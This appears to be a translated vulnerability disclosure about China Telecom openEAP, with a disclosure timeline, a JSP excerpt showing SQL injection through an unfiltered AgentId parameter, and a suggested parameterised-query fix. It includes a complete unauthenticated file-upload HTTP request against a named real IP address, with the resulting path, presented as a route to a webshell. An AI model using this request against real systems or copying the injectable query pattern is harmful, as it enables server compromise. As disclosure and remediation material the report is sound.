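2014-09-02: Details reported to the vendor; awaiting vendor handling
2014-09-07: Vendor confirmed; details disclosed to the vendor only
2014-09-10: Details opened to third-party security partners
2014-11-01: Details disclosed to core white hats and experts in the relevant field
2014-11-11: Details disclosed to regular white hats
2014-11-21: Details disclosed to intern white hats
2014-12-01: Details disclosed to the public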
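China Telecom openEAP generic injection vulnerability, affecting many Telecom systems nationwide
In the agent.war package of China Telecom openEAP, the page app\enterprise\AgentInfo.jsp does not filter its parameter, which leads to an injection vulnerability.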
<%
    String AId = request.getParameter("AgentId"); // read the AgentId parameter
    if (AId == null) AId = "";
    String AutoAnswer = "true";
    String MusicAlert = "true";
    String MonitorType = "0";
    String MonitorObject = "1";
    String WorkService = "";
    String AgentRole = "101";
    String CallOutLimited = "";
    String EntIdList = "";
    String EntNameList = "";
    if (!AId.equals("")) {
        // check whether the agent ID exists
        QueryHelper qh = new QueryHelper();
        String sql = "SELECT * FROM SYS_AGENT WHERE AGENTID = '" + AId + "'"; // concatenated into the query unfiltered
        List list = qh.executeQuery(sql); // run the query
        if (list.size() > 0) {
            RowModel row = (RowModel) list.get(0);
            AutoAnswer = row.getColumnValue("AutoAnswer");
            MusicAlert = row.getColumnValue("MusicAlert");
            MonitorType = row.getColumnValue("MonitorType");
            MonitorObject = row.getColumnValue("MonitorObject");
            WorkService = row.getColumnValue("WorkService");
            AgentRole = row.getColumnValue("Free1");
            CallOutLimited = row.getColumnValue("Free2");
            EntIdList = row.getColumnValue("Free3");
            EntNameList = row.getColumnValue("Free4");
        }
    }
%>
Database: Sybase.
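As an aside, this system does not actually require a login to get a webshell, so I don't know why this one needed brute forcing: WooYun: Weak passwords in a provincial Telecom customer service system leak all kinds of information
Upload point that requires no login: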
POST /info/servletinfo?funcid=upload HTTP/1.1
Host: 202.99.225.35:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.99.225.35:9080/info/maintain/display.jsp?dsName=whinfo_ds&infoId=10&&Code=
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------184676857810583403552066782031
Content-Length: 352

-----------------------------184676857810583403552066782031
Content-Disposition: form-data; name="funcid"

-----------------------------184676857810583403552066782031
Content-Disposition: form-data; name="tt"; filename="wooyun.jsp"
Content-Type: application/octet-stream

test
-----------------------------184676857810583403552066782031--
Path after upload: /suntek_eap_info_file_dir/attach/public/wooyun.jsp
Filter the input and add permission checks.
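One way to implement the filtering half of this fix, as an added example (not code from the original report or from openEAP): the AgentInfo.jsp lookup rewritten with plain JDBC parameter binding and an allowlist check on AgentId. The class name AgentLookup, the ID pattern, and the use of a java.sql.Connection in place of the product's QueryHelper are assumptions; the permission check still has to be enforced before this lookup is reached.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Pattern;

// Added example: hardened replacement for the concatenated lookup in AgentInfo.jsp.
public class AgentLookup {
    // Assumption: agent IDs are 1-16 ASCII letters or digits; adjust to the real format.
    private static final Pattern AGENT_ID = Pattern.compile("[A-Za-z0-9]{1,16}");

    // Columns the page reads; naming them avoids SELECT * and limits what is returned.
    private static final String[] COLUMNS = {
        "AutoAnswer", "MusicAlert", "MonitorType", "MonitorObject",
        "WorkService", "Free1", "Free2", "Free3", "Free4"
    };

    static boolean isValidAgentId(String id) {
        return id != null && AGENT_ID.matcher(id).matches();
    }

    // Returns the agent's settings, or null if the ID is malformed or not found.
    static Map<String, String> findAgent(Connection conn, String agentId) throws SQLException {
        if (!isValidAgentId(agentId)) {
            return null; // reject before touching the database
        }
        String sql = "SELECT " + String.join(", ", COLUMNS) + " FROM SYS_AGENT WHERE AGENTID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, agentId); // bound as data, never parsed as SQL
            try (ResultSet rs = ps.executeQuery()) {
                if (!rs.next()) return null;
                Map<String, String> row = new LinkedHashMap<>();
                for (String col : COLUMNS) row.put(col, rs.getString(col));
                return row;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a plain ID and one containing a quote character.
        System.out.println(isValidAgentId("1001"));
        System.out.println(isValidAgentId("1001'"));
    }
}
```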
Severity: High
Vulnerability Rank: 18
Confirmed at: 2014-09-07 09:26
None yet